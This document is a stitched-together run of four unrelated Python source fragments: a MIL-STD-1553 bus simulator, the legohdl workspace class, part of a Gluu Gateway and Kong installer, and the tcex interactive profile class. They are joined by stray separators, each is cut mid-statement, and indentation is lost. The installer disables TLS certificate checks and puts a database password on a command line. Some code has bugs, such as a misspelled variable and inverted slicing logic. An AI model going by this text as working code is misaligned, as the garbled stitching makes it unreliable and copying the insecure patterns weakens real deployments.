if len(d_bytes) % 2 != 0:
raise ValueError(f'len {len(d_bytes)} is not even')
return [Data(data=d_bytes[w*2:(w+1)*2]) for w in range(len(d_bytes)//2)]
@classmethod
def unpack(cls, data: List, is_float=False):
data: List[Data]
d_bytes = b''.join(
[w.data if isinstance(w, Data) else w for w in data])
if len(d_bytes) % 4 != 0:
raise ValueError(f'len {len(d_bytes)} is not a multiplier of 4')
# each word is 16 bits (two bytes) and each number is 32 bits
# so 2 words per number
if is_float:
fmt = "<%df" % (len(d_bytes) // 4)
else:
fmt = "<%di" % (len(d_bytes) // 4)
return struct.unpack(fmt, d_bytes)
class Command(Word):
def __init__(
self,
# the RT address which is five bits long
# address 11111 (31) is reserved for broadcast protocol
address=0,
# 0: recieve data
# 1: transmit data
tr=0,
# 5 bits used to indicate an RT subaddress
# 00000 and 11111 (31) are reserved
sub_address=2,
# the quantity of data that will follow after the command
# 00000 means 32 ??? and 11111 means 31
dword_count=0,
# parity bit over last 16 bits
parity=0,
) -> None:
super().__init__()
self.address = address
self.tr = tr
self.sub_address = sub_address
self.dword_count = dword_count
self.parity = parity
def __str__(self) -> str:
attrs = sorted(vars(self).items(), key=lambda x: x[0])
prefix = super().__str__()
return prefix + '('+', '.join([k[:2]+'-'+str(v) for k, v in attrs])+')'
# used to indicate which type of terminal this device should be
class Mode(Enum):
RT = 1
BC = 2
BM = 3
# use to indicate the type of communication that is happening for each device
class State(Enum):
IDLE = 0
TRANSMIT = 1
RECEIVE = 2
OFF = 3
WAIT = 4
TRANSMIT_CMD = 5
class BusABC():
def write(self, device, words: List[Word]):
pass
def recv(self, device) -> Word:
pass
'''
mode: type of this device: BC, RT or BM
state: way this device interprets the commands being sent over the bus
bus: ???
address: address of this device on the network between 0 and 31
queue: list of all messages this device recieved over the network it must process
event_handlers: ???
uuid: unique ID for this device
system: system this device is connected to
'''
class Device():
def __init__(
self, bus: BusABC, mode=Mode.RT, address=-1, state=State.IDLE,
id=None, system='', dword_count=0, **other_attributes) -> None:
self.fake: bool = False
# allows to determine whether the current command was cancelled during idel mode
self.rt_cmd_cancelled = False
# allows to count the nuber of commands pending on RT at a given time
self.number_of_current_cmd = 0
# current local clock of the RT
self.lclock: int = 0
# current CMD 0 for T/R and 1 for MC
self.ccmd: int = 0
self.in_brdcst = False
self.mode: Mode = mode
self.state: State = state
self.bus: BusABC = bus
self.address = address
self.port = -1
self.event_handlers = {}
self.id = uuid.uuid4().hex if not id else id
self.system = system
self.dword_count = dword_count
for k, v in other_attributes.items():
setattr(self, k, v)
# memory/storage for the device
# if we directly use these objects from the other classes,
# it means the whole object needed to be copied over different processes
# so we have to keep the memory/storage within this class (maybe large)
# and provide interfaces to slice them
# -- memory: linear layout of words (two-bytes)
self.memory: List[bytes] = []
# -- storage: key-(multi-val) object storage
self.storage = defaultdict(list)
self.clock_start = datetime.now()
def on(self, event_name, handler):
if not isinstance(event_name, str):
event_name = event_name.__name__
self.event_handlers[event_name] = handler
@ delay
def write(self, word: Word):
if not isinstance(word, list):
word = [word]
if not hasattr(self, 'sock_trans'):
self.sock_trans = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock_trans.bind(('', 0))
for w in word:
w.fake = self.fake
for d in self.bus.values():
if d.port > 0:
self.sock_trans.sendto(w.to_bytes(), ('127.0.0.1', d.port))
def clock(self):
if self.state == State.OFF and self.mode != Mode.BM:
return 0
return (datetime.now() - self.clock_start) // timedelta(milliseconds=1)
def set_state(self, new_state):
if config.SYS_LOG_EVENT:
log.info('\033[32m{}{}{} changed from {} to {}\033[39m'.format(
str(self.mode)[5], str(self.mode)[6], self.address, self.state, new_state))
# added clocking when turning on:
if self.state == State.OFF and new_state != State.OFF:
self.clock_start = datetime.now()
self.state = new_state
# use to be:
# log.info('{} change from {} to {}'.format(
# self.name(), self.state, new_state))
# self.state = new_state
# Now easier to backtrack the RTs
def mem_put(self, words: List[bytearray], addr=None):
if not isinstance(words, List):
words = [words]
if addr is None:
self.memory.extend(words)
else:
for i in range(len(words)):
self.memory[i+addr] = words[i]
return len(self.memory)
def mem_get(self, start=0, end=None):
if end:
return self.memory[start:]
else:
return self.memory[start:end]
def mem_unpack(self, is_float=False):
return Data.unpack(self.memory, is_float=is_float)
def mem_reset(self):
self.memory = []
def store_get(self, key=None):
return self.storage[key]
def store_append(self, data, key=None):
self.storage[key].append(data)
def store_set(self, data, key=None):
self.storage[key] = data
'''
target: ID of target RT to send data to
words: set of data to send to target RT
'''
def act_bc2rt(self, target, words: List[Word], ignore_limit=False):
nwords = len(words)
if not ignore_limit:
if nwords > 31:
raise Exception("Max number is 31 (2^5=32)")
# first, send 'receive' command word with the target RT ID & amount of data
cmd = Command(address=target, dword_count=nwords, tr=0)
# set the state of this device to be transmitting data
# self.state = State.TRANSMIT # this is BC state
self.set_state(State.TRANSMIT_CMD)
# write the command word first, to notify the target device to receive data
self.write(cmd)
# send the data
self.set_state(State.TRANSMIT)
for w in words:
self.write(w)
if | |
# ------------------------------------------------------------------------------
# Project: legohdl
# Script: workspace.py
# Author: <NAME>
# Description:
# The Workspace class. A Workspace object has a path and a list of available
# vendors. This is what the user keeps their work's scope within for a given
# "organization".
# ------------------------------------------------------------------------------
import os, shutil, glob
import logging as log
from datetime import datetime
from .vendor import Vendor
from .apparatus import Apparatus as apt
from .cfg import Cfg, Section, Key
from .map import Map
from .git import Git
from .block import Block
class Workspace:
#store all workspaces in dictionary
Jar = Map()
#active-workspace is a workspace object
_ActiveWorkspace = None
DIR = apt.fs(apt.HIDDEN+"workspaces/")
LOG_FILE = "refresh.log"
MIN_RATE = -1
MAX_RATE = 1440
def __init__(self, name, path, vendors=[], ask=True):
'''
Create a workspace instance.
Parameters:
name (str): the identity for the workspace
path (str): the local path where blocks will be looked for
vendors ([str]): the list of vendors that are tied to this workspace
ask (bool): will ask user if wishing to enter workspace path
Returns:
None
'''
self._name = name
#do not create workspace if the name is already taken
if(self.getName().lower() in self.Jar.keys()):
log.error("Skipping workspace "+self.getName()+" due to duplicate naming conflict.")
return
#set the path
self._path = ''
self.setPath(path)
#do not create workspace if the path is empty
if(self.getPath() == ''):
if(ask == False):
log.error("Skipping workspace "+self.getName()+" due to empty local path.")
return
else:
#keep asking to set path until one is decided/input
try:
path = input("Enter path for workspace "+self.getName()+": ")
except KeyboardInterrupt:
apt.CFG.remove('workspace.'+self.getName())
Workspace.save(inc_active=False)
print()
exit(log.info("Workspace not created."))
while(self.setPath(path) == False):
try:
path = input("Enter path for workspace "+self.getName()+": ")
except KeyboardInterrupt:
apt.CFG.remove('workspace.'+self.getName())
Workspace.save(inc_active=False)
print()
exit(log.info("Workspace not created."))
self._ws_dir = apt.fs(self.DIR+self.getName()+"/")
#ensure all workspace hidden directories exist
if(os.path.isdir(self.getDir()) == False):
log.info("Setting up workspace "+self.getName()+"...")
os.makedirs(self.getDir(), exist_ok=True)
#create workspace's cache where installed blocks will be stored
os.makedirs(self.getDir()+"cache", exist_ok=True)
#create the refresh log if DNE
if(os.path.isfile(self.getDir()+self.LOG_FILE) == False):
open(self.getDir()+self.LOG_FILE, 'w').close()
self._vendors = []
#find all vendor objects by name and store in list
for vndr in vendors:
if(vndr.lower() in Vendor.Jar.keys()):
self._vendors += [Vendor.Jar[vndr]]
else:
log.warning("Could not link unknown vendor "+vndr+" to "+self.getName()+".")
pass
#add to class Jar
self.Jar[self.getName()] = self
pass
def setPath(self, p):
'''
Set the workspace's local path to a new value. Will ask user if okay
to create the path if DNE.
Parameters:
p (str): the path string
Returns:
(bool): true if successfully changed the path attribute
'''
#cannot set an empty path
if(p == '' or p == None):
log.info("Local path for workspace "+self.getName()+" cannot be empty.")
return False
p = apt.fs(p)
#create the workspace's local path if it does not exist
if(os.path.exists(p) == False):
#prompt user
carry_on = apt.confirmation("Workspace "+self.getName()+"'s local path does not exist. Create "+p+"?")
if(carry_on):
os.makedirs(p, exist_ok=True)
self._path = p
return True
else:
log.info("Did not set "+p+" as local path.")
return False
else:
self._path = p
return True
def setName(self, n):
'''
Change the workspace's name if the name is not already taken.
Parameters:
n (str): new name for workspace
Returns:
(bool): true if name successfully altered and updated in Jar
'''
if(n == '' or n == None):
log.error("Workspace name cannot be empty.")
return False
if(n.lower() in self.Jar.keys()):
log.error("Cannot rename workspace to "+n+" due to name conflict.")
return False
else:
#remove old name from Jar
if(self.getName().lower() in self.Jar.keys()):
del self.Jar[self.getName()]
#rename hidden directory if exists
new_dir = apt.fs(self.DIR+n+"/")
if(hasattr(self, "_ws_dir")):
os.rename(self.getDir(), new_dir)
#set the hidden workspace directory
self._ws_dir = new_dir
#change to new name
self._name = n
#update the Jar
self.Jar[self.getName()] = self
return True
def remove(self):
'''
Removes the workspace object from the Jar and its hidden directory.
Parameters:
None
Returns:
None
'''
log.info("Removing workspace "+self.getName()+"...")
#delete the hidden workspace directory
shutil.rmtree(self.getDir(), onerror=apt.rmReadOnly)
#remove from class Jar
del self.Jar[self.getName()]
#remove from cfg file
apt.CFG.remove('workspace.'+self.getName())
apt.CFG.write()
pass
def linkVendor(self, vndr):
'''
Attempts to add a vendor to the workspace's vendor list.
Parameters:
vndr (str): name of the vendor to add
Returns:
(bool): true if the vendor list was modified (successful add)
'''
if(vndr.lower() in Vendor.Jar.keys()):
vndr_obj = Vendor.Jar[vndr]
if(vndr_obj in self.getVendors()):
log.info("Vendor "+vndr_obj.getName()+" is already linked to this workspace.")
return False
else:
log.info("Linking vendor "+vndr_obj.getName()+" to the workspace...")
self._vendors += [vndr_obj]
return True
else:
log.warning("Could not link unknown vendor "+vndr+" to "+self.getName()+".")
return False
def setVendors(self, vndrs):
'''
Overrides entire _vendors attr by setting it equal to 'vndrs'.
Parameters:
vndrs ([str]): list of vendors
Returns:
(bool): success if all vendors listed were added
'''
#reset vendors list
self._vendors = []
success = True
#iterate through every given vendor
for vndr in vndrs:
#verify the vendor exists
if(vndr.lower() in Vendor.Jar.keys()):
vndr_obj = Vendor.Jar[vndr]
#check if the vendor has already been linked
if(vndr_obj in self.getVendors()):
log.info("Vendor "+vndr_obj.getName()+" is already linked to this workspace.")
#link the vendor to this workspace
else:
log.info("Linking vendor "+vndr_obj.getName()+" to the workspace...")
self._vendors += [vndr_obj]
else:
log.warning("Could not link unknown vendor "+vndr+" to "+self.getName()+".")
sucess = False
return success
def unlinkVendor(self, vndr):
'''
Attempts to remove a vendor from the workspace's vendor list.
Parameters:
vndr (str): name of the vendor to remove
Returns:
(bool): true if the vendor list was modified (successful remove)
'''
if(vndr.lower() in Vendor.Jar.keys()):
vndr_obj = Vendor.Jar[vndr]
if(vndr_obj not in self.getVendors()):
log.info("Vendor "+vndr_obj.getName()+" is already unlinked from the workspace.")
return False
else:
log.info("Unlinking vendor "+vndr_obj.getName()+" from the workspace...")
self._vendors.remove(vndr_obj)
return True
else:
log.warning("Could not unlink unknown vendor "+vndr+" from "+self.getName()+".")
return False
def loadBlocks(self, id_dsgns=False):
'''
Loads all blocks found at all levels: dnld (workspace path), instl (workspace
cache), avail (workspace vendors).
When id_dsgns is True, this method uses the 'multi-develop' setting to
determine which level has precedence in loadHDL().
'multi-develop' set to False will only loadHDL() from cache. 'multi-develop'
set to True will first try to loadHDL() from dnld, and if DNE, then try
to loadHDL() from block's cache.
Either way, if inside a current block, that block's HDL will be loaded over
its cache.
Dynamically creates _visible_blocks ([Block]) attribute to be reused.
Parameters:
id_dsgns (bool): identify design units (loadHDL) from blocks
Returns:
_visible_blocks ([Block]): list of all block objects in cache or path
'''
if(hasattr(self, "_visible_blocks")):
return self._visible_blocks
self._visible_blocks = []
#read the setting for multi-develop
mult_dev = apt.getMultiDevelop()
#1. Search for downloaded blocks
#glob on the local workspace path
#print("Local Blocks on:",self.getPath())
marker_files = glob.glob(self.getPath()+"**/*/"+apt.MARKER, recursive=True)
#iterate through all found downloads
for mf in marker_files:
b = Block(mf, self, Block.Level.DNLD)
#if the user is within a current block, load the HDL from its DNLD level (not INSTL)
if(mult_dev == True or Block.getCurrent(bypass=True) == b):
self._visible_blocks += [b]
if(id_dsgns):
b.loadHDL()
pass
#2. Search for installed blocks
#glob on the workspace cache path
#print("Cache Blocks on:",self.getCachePath())
marker_files = glob.glob(self.getCachePath()+"**/*/"+apt.MARKER, recursive=True)
#iterate through all found installations
for mf in marker_files:
#the block must also have a valid git repository at its root
root,_ = os.path.split(mf)
#note: only the head installation has the git repository
if(Git.isValidRepo(root, remote=False)):
b = Block(mf, self, Block.Level.INSTL)
#get the spot for this block's download
dnld_b = Block.Inventory[b.M()][b.L()][b.N()][Block.Level.DNLD.value]
#add this block if a download DNE or the dnld does not match current when
#not in multi-develop mode
if(dnld_b == None or (mult_dev == False and Block.getCurrent(bypass=True) != dnld_b)):
self._visible_blocks += [b]
if(id_dsgns):
b.loadHDL()
pass
#3. Search for available blocks
#glob on each vendor path
marker_files = []
#find all marker files in each of the workspace's vendors
for vndr in self.getVendors():
marker_files += glob.glob(vndr.getVendorDir()+"**/*/"+apt.MARKER, recursive=True)
#iterate through all found availables
for mf in marker_files:
b = Block(mf, self, Block.Level.AVAIL)
#do not add this block to list of visible blocks because it has no
#units associated with it, only metadata
pass
#4. ID all specific version blocks if identifying designs (except current block)
spec_vers_blocks = []
for vis_block in self._visible_blocks:
if(vis_block == Block.getCurrent(bypass=True)):
continue
for spec_block in vis_block.getInstalls().values():
spec_vers_blocks += [spec_block]
if(id_dsgns):
spec_block.loadHDL()
pass
pass
self._visible_blocks += spec_vers_blocks
return self._visible_blocks
def shortcut(self, title, req_entity=False, visibility=True, ref_current=True):
'''
| |
continue
self.run([self.cmd_rm, '-rf', '%s/%s/migrations' % (self.dist_kong_plugins_folder, plugin)])
self.run([self.cmd_rm, '-R', '%s/%s/daos.lua' % (self.dist_kong_plugins_folder, plugin)])
def install_jre(self):
self.log_it("Installing server JRE 1.8 %s..." % self.jre_version)
jre_archive = 'server-jre-8u%s-linux-x64.tar.gz' % self.jre_version
try:
self.log_it("Extracting %s into %s/%s" % (jre_archive, self.gg_dist_app_folder, jre_archive))
self.run(['tar', '-xzf', '%s/%s' % (self.gg_dist_app_folder, jre_archive), '-C', '/opt/', '--no-xattrs', '--no-same-owner', '--no-same-permissions'])
except:
self.log_it("Error encountered while extracting archive %s" % jre_archive)
self.log_it(traceback.format_exc(), True)
self.run([self.cmd_ln, '-sf', self.jre_destination_path, self.jre_home])
self.run([self.cmd_chmod, '-R', '755', '%s/bin/' % self.jre_destination_path])
with open('/etc/environment', 'a') as f:
f.write('JAVA_HOME=/opt/jre')
if self.os_type in [Distribution.Ubuntu, Distribution.Debian]:
self.run([self.cmd_update_alternatives, '--install', '/usr/bin/java', 'java', '%s/bin/java' % (self.jre_home), '1'])
elif self.os_type in [Distribution.CENTOS, Distribution.RHEL]:
self.run([self.cmd_alternatives, '--install', '/usr/bin/java', 'java', '%s/bin/java' % (self.jre_home), '1'])
def config_gluu_gateway_ui(self):
self.log_it('Installing gluu_gateway_ui node packages...')
print ('Installing gluu_gateway_ui node packages...')
if not os.path.exists(self.cmd_node):
self.run([self.cmd_ln, '-s', '`which nodejs`', self.cmd_node])
try:
self.run([self.cmd_mkdir, '-p', self.gg_node_modules_folder])
self.log_it("Extracting %s into %s" % (self.gg_node_modules_archive, self.gg_node_modules_folder))
self.run(['tar', '--strip', '1', '-xzf', '%s/%s' % (self.gg_dist_folder, self.gg_node_modules_archive), '-C', self.gg_node_modules_folder, '--no-xattrs', '--no-same-owner', '--no-same-permissions'])
except:
self.log_it("Error encountered while extracting archive %s" % self.gg_node_modules_archive)
self.log_it(traceback.format_exc(), True)
try:
self.run([self.cmd_mkdir, '-p', self.gg_bower_modules_folder])
self.log_it("Extracting %s into %s" % (self.gg_bower_modules_archive, self.gg_bower_modules_folder))
self.run(['tar', '--strip', '1', '-xzf', '%s/%s' % (self.gg_dist_folder, self.gg_bower_modules_archive), '-C', self.gg_bower_modules_folder, '--no-xattrs', '--no-same-owner', '--no-same-permissions'])
except:
self.log_it("Error encountered while extracting archive %s" % self.gg_bower_modules_archive)
self.log_it(traceback.format_exc(), True)
if self.generate_client:
msg = 'Creating OXD OP client for Gluu Gateway GUI used to call oxd-server endpoints...'
self.log_it(msg)
print (msg)
oxd_registration_endpoint = self.gluu_gateway_ui_oxd_web + '/register-site'
redirect_uri = 'https://' + self.gluu_gateway_ui_redirect_uri + ':' + self.gluu_gateway_ui_port
payload = {
'op_host': self.gluu_gateway_ui_op_host,
'redirect_uris': [redirect_uri],
'post_logout_redirect_uris': [redirect_uri],
'scope': ['openid', 'oxd', 'permission', 'username'],
'grant_types': ['authorization_code', 'client_credentials'],
'client_name': 'KONGA_GG_UI_CLIENT'
}
oxd_registration_response = self.http_post_call(oxd_registration_endpoint, payload)
self.gluu_gateway_ui_oxd_id = oxd_registration_response['oxd_id']
self.gluu_gateway_ui_client_secret = oxd_registration_response['client_secret']
self.gluu_gateway_ui_client_id = oxd_registration_response['client_id']
# Render gluu_gateway_ui property
self.run([self.cmd_touch, os.path.split(self.dist_gluu_gateway_ui_config_file)[-1]],
self.dist_gluu_gateway_ui_config_folder, os.environ.copy(), True)
self.render_template_in_out(self.dist_gluu_gateway_ui_config_file, self.template_folder, self.dist_gluu_gateway_ui_config_folder)
# konga db migration
self.run(['npm', 'run', 'db-migrate', 'postgres://postgres:%s@localhost:5432/konga' % self.pg_pwd], self.dist_gluu_gateway_ui_folder, os.environ.copy(), True)
def is_ip(self, address):
try:
socket.inet_aton(address)
return True
except socket.error:
return False
def log_it(self, msg, error_log=False):
if error_log:
f = open(self.log_error, 'a')
f.write('%s %s\n' % (time.strftime('%X %x'), msg))
f.close()
f = open(self.log, 'a')
f.write('%s %s\n' % (time.strftime('%X %x'), msg))
f.close()
def make_boolean(self, c):
if c in ['t', 'T', 'y', 'Y']:
return True
if c in ['f', 'F', 'n', 'N']:
return False
self.log_it("make_boolean: invalid value for true|false: " + c, True)
def make_folders(self):
try:
self.run([self.cmd_mkdir, '-p', self.cert_folder])
self.run([self.cmd_mkdir, '-p', self.output_folder])
except:
self.log_it("Error making folders", True)
self.log_it(traceback.format_exc(), True)
def prompt_for_properties(self):
# Certificate configuration
self.ip = self.get_ip()
self.host_name = self.get_prompt('Enter Hostname', self.detect_host_name())
print ('The next few questions are used to generate the Kong self-signed HTTPS certificate')
self.country_code = self.get_prompt('Enter two letter Country Code')
self.state = self.get_prompt('Enter two letter State Code')
self.city = self.get_prompt('Enter your city or locality')
self.org_name = self.get_prompt('Enter Organization Name')
self.admin_email = self.get_prompt('Enter Email Address')
# Postgres configuration
msg = """
If you already have a postgres user and database in the
Postgres DB, then enter existing password, otherwise enter new password: """
print (msg)
pg = self.get_pw()
self.pg_pwd = getpass.getpass(prompt='Password [%s] : ' % pg) or pg
# We are going to ask for 'OP host_name' regardless of whether we're installing oxd or not
self.gluu_gateway_ui_op_host = 'https://' + self.get_prompt('OP Server Host')
# Konga Configuration
msg = """
The next few questions are used to configure Konga.
If you are connecting to an existing oxd server from other the network,
make sure it's available from this server."""
print (msg)
self.gluu_gateway_ui_oxd_web = self.get_prompt('Enter your existing OXD server URL')
self.generate_client = self.make_boolean(self.get_prompt("Generate client credentials to call oxd-server API's? (y - generate, n - enter existing client credentials manually)", 'y'))
if not self.generate_client:
self.gluu_gateway_ui_oxd_id = self.get_prompt('OXD Id')
self.gluu_gateway_ui_client_id = self.get_prompt('Client Id')
self.gluu_gateway_ui_client_secret = self.get_prompt('Client Secret')
def install_config_kong(self):
# Install Kong
kong_package_file = ''
install_kong_cmd = []
if self.os_type == Distribution.Ubuntu and self.os_version == '18':
kong_package_file = "%s/%s" % (self.gg_dist_app_folder, self.ubuntu18_kong_file)
install_kong_cmd = [self.cmd_dpkg, '--install', kong_package_file]
if self.os_type == Distribution.CENTOS and self.os_version == '7':
kong_package_file = "%s/%s" % (self.gg_dist_app_folder, self.centos7_kong_file)
install_kong_cmd = [self.cmd_rpm, '--install', '--verbose', '--hash', kong_package_file]
if self.os_type == Distribution.RHEL and self.os_version == '7':
kong_package_file = "%s/%s" % (self.gg_dist_app_folder, self.rhel7_kong_file)
install_kong_cmd = [self.cmd_rpm, '--install', '--verbose', '--hash', kong_package_file]
if not os.path.exists(kong_package_file):
self.log_it("%s is not found" % kong_package_file)
sys.exit(0)
self.run(install_kong_cmd)
if self.os_type == Distribution.Ubuntu and self.os_version in ['18']:
self.kong_lua_ssl_trusted_certificate = "/etc/ssl/certs/ca-certificates.crt"
if self.os_type in [Distribution.CENTOS, Distribution.RHEL]:
self.kong_lua_ssl_trusted_certificate = "/etc/ssl/certs/ca-bundle.crt"
self.render_template_in_out(self.dist_kong_config_file, self.template_folder, self.dist_kong_config_folder)
def render_template_in_out(self, file_path, template_folder, output_folder):
self.log_it("Rendering template %s" % file_path)
fn = os.path.split(file_path)[-1]
f = open(os.path.join(template_folder, fn))
template_text = f.read()
f.close()
newFn = open(os.path.join(output_folder, fn), 'w+')
newFn.write(template_text % self.__dict__)
newFn.close()
def run(self, args, cwd=None, env=None, use_wait=False, shell=False):
self.log_it('Running: %s' % ' '.join(args))
try:
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd, env=env, shell=shell)
if use_wait:
code = p.wait()
self.log_it('Run: %s with result code: %d' % (' '.join(args), code))
else:
output, err = p.communicate()
if output:
self.log_it(output)
if err:
self.log_it(err, True)
except:
self.log_it("Error running command : %s" % " ".join(args), True)
self.log_it(traceback.format_exc(), True)
def migrate_kong(self):
print ("Migrating kong db...")
self.log_it("Migrating kong db...")
self.run([self.cmd_kong, "migrations", "up"])
self.run([self.cmd_kong, "migrations", "finish"])
def start_gg_service(self):
print ("Starting %s..." % self.gg_service)
self.log_it("Starting %s..." % self.gg_service)
if self.os_type == Distribution.Ubuntu and self.os_version in ['18']:
self.run([self.cmd_systemctl, 'stop', self.gg_service])
self.run([self.cmd_systemctl, 'start', self.gg_service])
self.run([self.cmd_systemctl, 'enable', self.gg_service])
elif self.os_type in [Distribution.CENTOS, Distribution.RHEL]:
self.run([self.cmd_systemctl, 'stop', self.gg_service])
self.run([self.cmd_systemctl, 'start', self.gg_service])
self.run([self.cmd_systemctl, 'enable', self.gg_service])
def copy_file(self, in_file, dest_folder):
try:
shutil.copy(in_file, dest_folder)
self.log_it("Copied %s to %s" % (in_file, dest_folder))
except:
self.log_it("Error copying %s to %s" % (in_file, dest_folder), True)
self.log_it(traceback.format_exc(), True)
def disable_warnings(self):
if self.os_type in [Distribution.Ubuntu, Distribution.CENTOS, Distribution.RHEL, Distribution.Debian]:
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def choose_from_list(self, list_of_choices, choice_name="item", default_choice_index=0):
return_value = None
choice_map = {}
chosen_index = 0
print ("\nSelect the number for the %s from the following list:" % choice_name)
for choice in list_of_choices:
choice_map[chosen_index] = choice
chosen_index += 1
print (" [%i] %s" % (chosen_index, choice))
while not return_value:
choice_number = self.get_prompt("Please select a number listed above", str(default_choice_index + 1))
try:
choice_number = int(choice_number) - 1
if (choice_number >= 0) & (choice_number < len(list_of_choices)):
return_value = choice_map[choice_number]
else:
print ('"%i" is not a valid choice' % (choice_number + 1))
except:
print ('Cannot convert "%s" to a number' % choice_number)
self.log_it(traceback.format_exc(), True)
return return_value
def detect_os_type(self):
try:
p = distro.linux_distribution()
self.os_type = p[0].split()[0].lower()
self.os_version = p[1].split('.')[0]
except:
self.os_type, self.os_version = self.choose_from_list(self.os_types, "Operating System")
self.log_it('OS Type: %s OS Version: %s' % (self.os_type, self.os_version))
def detect_initd(self):
self.os_initdaemon = open(os.path.join('/proc/1/status'), 'r').read().split()[1]
def http_post_call(self, endpoint, payload):
response = None
try:
response = requests.post(endpoint, data=json.dumps(payload), headers={'content-type': 'application/json'}, verify=False)
response_json = json.loads(response.text)
if response.ok:
return response_json
else:
message = """Error: Failed Not Ok Endpoint: %s
Payload %s
Response %s
Response_Json %s
Please check logs.""" % (endpoint, payload, response, response_json)
self.exit(message)
except requests.exceptions.HTTPError as e:
message = """Error: Failed Http Error:
Endpoint: %s
Payload %s
Response %s
Error %s
Please check logs.""" % (endpoint, payload, response, e)
self.exit(message)
except requests.exceptions.ConnectionError as e:
message = """Error: Failed to Connect:
Endpoint: %s
Payload %s
Response %s
Error %s
Please check logs.""" % (endpoint, payload, response, e)
self.exit(message)
except requests.exceptions.RequestException as e:
message = """Error: Failed Something Else:
Endpoint %s
Payload %s
Response %s
Error %s
Please check logs.""" % (endpoint, payload, response, e)
self.exit(message)
def http_get_call(self, endpoint):
response = None
try:
response = requests.get(endpoint, headers={'content-type': 'application/json'}, verify=False)
response_json = json.loads(response.text)
return response_json
except requests.exceptions.HTTPError as e:
message = """Error: Failed Http Error:
Endpoint: %s
Response %s
Error %s
Please check logs.""" % (endpoint, response, e)
self.exit(message)
except requests.exceptions.ConnectionError as e:
message = """Error: Failed to Connect:
Endpoint: %s
Response %s
Error %s
Please check logs.""" % (endpoint, response, e)
self.exit(message)
except requests.exceptions.RequestException as e:
message = """Error: Failed Something Else:
Endpoint %s
Response %s
Error %s
Please check logs.""" % (endpoint, response, e)
self.exit(message)
def exit(self, message):
print (message)
self.log_it(message, True)
sys.exit()
def configure_kong_rotate(self):
self.log_it("Configuring log rotate for kong")
self.run([self.cmd_cp, '%s/%s' % (self.template_folder, self.kong_log_rotate_config_file), "%s/kong" % self.dist_kong_log_rotate_config_path])
def check_root(self):
try:
user = pwd.getpwuid(os.getuid()).pw_name
print (user)
if user != "root":
msg="Your user is not root user, Run setup script in root user."
print (msg)
self.log_it(msg, True)
sys.exit()
except Exception as err:
self.log_it("Failed to execute `pwd.getpwuid(os.getuid()).pw_name` | |
<filename>tcex/profile/interactive.py
"""TcEx testing profile Class."""
# standard library
import json
import math
# import os
import re
import sys
from base64 import b64encode
from typing import Optional, Union
# third-party
import colorama as c
# autoreset colorama
c.init(autoreset=True, strip=False)
class Interactive:
"""Testing Profile Interactive Class."""
def __init__(self, profile: object):
"""Initialize Class properties.
Args:
profile (Profile): The profile object to build interactive inputs.
"""
self.profile = profile
# properties
self._inputs = {
'optional': {},
'required': {},
}
self._no_selection_text = 'No Selection'
self._staging_data = {'kvstore': {}}
# self._user_defaults = None
self.collect_type_map = {
'Any': self.collect_string,
'Binary': self.collect_binary,
'BinaryArray': self.collect_binary_array,
'KeyValue': self.collect_key_value,
'KeyValueArray': self.collect_key_value_array,
'String': self.collect_string,
'StringArray': self.collect_string_array,
'TCEntity': self.collect_tcentity,
'TCEntityArray': self.collect_tcentity_array,
}
self.exit_codes = []
self.input_type_map = {
'boolean': self.present_boolean,
'choice': self.present_choice,
'keyvaluelist': self.present_key_value_list,
'multichoice': self.present_multichoice,
'string': self.present_string,
'editchoice': self.present_editchoice,
}
# self.user_defaults_filename = os.path.join('tests', '.user_defaults')
def _default(self, data: dict) -> Union[list, str]: # pylint: disable=unused-argument
"""Return the best option for default.
Args:
data: The install.json params object.
Returns:
list, str: The default value for the input.
"""
if data.get('type').lower() == 'boolean':
default = str(data.get('default', 'false')).lower()
elif data.get('type').lower() == 'choice':
default = 0
valid_values: list = self._expand_valid_values(data.get('validValues', []))
if data.get('name') == 'tc_action':
for vv in valid_values:
if self.profile.feature.lower() == vv.replace(' ', '_').lower():
default = vv
break
else:
default: str = data.get('default')
elif data.get('type').lower() == 'multichoice':
default: str = data.get('default')
if default is not None and isinstance(default, str):
default: list = default.split('|')
else:
default = data.get('default')
# if default is None:
# # set default from user default file
# default = self.user_defaults.get(data.get('name'))
return default
def _expand_valid_values(self, valid_values: list) -> list:
"""Expand supported playbook variables to their full list.
Args:
valid_values (list): The list of valid values for Choice or MultiChoice inputs.
Returns:
list: An expanded list of valid values for Choice or MultiChoice inputs.
"""
valid_values = list(valid_values)
if '${ARTIFACT_TYPES}' in valid_values:
valid_values.remove('${ARTIFACT_TYPES}')
valid_values.extend(
[
'ASN',
'Asset Group ID',
'Certificate File',
'CIDR',
'Credential ID',
'Document Metadata',
'Email Address',
'Email Attachment File',
'Email Attachment File Name',
'Email Body',
'Email Message File',
'Email Subject',
'Event File',
'Exploit ID',
'File Hash',
'Filter ID',
'Hashtag',
'Host',
'Image File',
'IP Address',
'Log File',
'MutEx',
'PCAP File',
'Policy ID',
'Registry Key',
'Results ID',
'Screenshot File',
'Tactic ID',
'Technique ID',
'Ticket ID',
'Timestamp',
'URL',
'User Agent',
'Vulnerability Detection ID',
'Vulnerability ID',
]
)
elif '${GROUP_TYPES}' in valid_values:
valid_values.remove('${GROUP_TYPES}')
valid_values.extend(
[
'Adversary',
'Attack Pattern',
'Campaign',
'Course of Action',
'Document',
'Email',
'Event',
'Incident',
'Intrusion Set',
'Malware',
'Report',
'Signature',
'Tactic',
'Task',
'Threat',
'Tool',
'Vulnerability',
]
)
elif '${INDICATOR_TYPES}' in valid_values:
valid_values.remove('${INDICATOR_TYPES}')
r = self.profile.session.get('/v2/types/indicatorTypes')
if r.ok:
valid_values.extend(
[t.get('name') for t in r.json().get('data', {}).get('indicatorType', {})]
)
elif '${OWNERS}' in valid_values:
valid_values.remove('${OWNERS}')
r = self.profile.session.get('/v2/owners')
if r.ok:
valid_values.extend(
[o.get('name') for o in r.json().get('data', {}).get('owner', {})]
)
elif '${USERS}' in valid_values:
valid_values.remove('${USERS}')
r = self.profile.session.get('/v2/owners/mine/members')
if r.ok:
valid_values.extend(
[o.get('userName') for o in r.json().get('data', {}).get('user', {})]
)
elif '${USER_GROUPS}' in valid_values:
valid_values.remove('${USER_GROUPS}')
valid_values.extend(['User Group 1', 'User Group 1'])
return valid_values
def _input_value(self, label: str, option_text: Optional[str] = None) -> str:
"""Return user input.
Args:
label: The label to display to the user.
option_text: the Option text to display to the user.
Returns:
